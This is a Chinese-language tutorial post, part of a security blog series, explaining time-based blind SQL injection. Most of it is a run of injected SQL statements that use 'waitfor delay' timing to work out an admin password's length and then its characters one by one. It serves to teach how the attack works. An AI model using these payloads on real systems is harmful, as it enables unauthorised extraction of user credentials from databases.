iT邦幫忙

DAY 12
1

駭客手法解析~你不能不知的資安問題!!系列 第 12

SQL Injection pattern〈四〉

  • 分享至 

  • xImage
  •  

資料萃取

Time based:透過頁面的回應 (wait or not) 以判斷注入的指令有無成功執行,通常用於無任何可靠的頁面回應。

常用的方法於前一相同為推演法:

推算 admin 的密碼長度:

select * from test where A = 1; if (select len(passwd) from users where id = 1) = 1 waitfor delay '0:0:10'--

select * from test where A = 1; if (select len(passwd) from users where id = 1) = 2 waitfor delay '0:0:10'--

select * from test where A = 1; if (select len(passwd) from users where id = 1) = 3 waitfor delay '0:0:10'--

得知長度後,利用二分法推算 admin 的密碼第一位:

select * from test where A = 1; if (select asc(mid(passwd,1,1)) from users where id = 1) > 128 waitfor delay '0:0:10'--

select * from test where A = 1; if (select asc(mid(passwd,1,1)) from users where id = 1) > 64 waitfor delay '0:0:10'--

select * from test where A = 1; if (select asc(mid(passwd,1,1)) from users where id = 1) > 32 waitfor delay '0:0:10'--

這邊只講到這邊, Time-based 的 Injection 較耗時,delay 時間可以自由調整!


上一篇
SQL Injection pattern〈三〉
下一篇
SQL Injection pattern〈五〉
系列文
駭客手法解析~你不能不知的資安問題!!30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言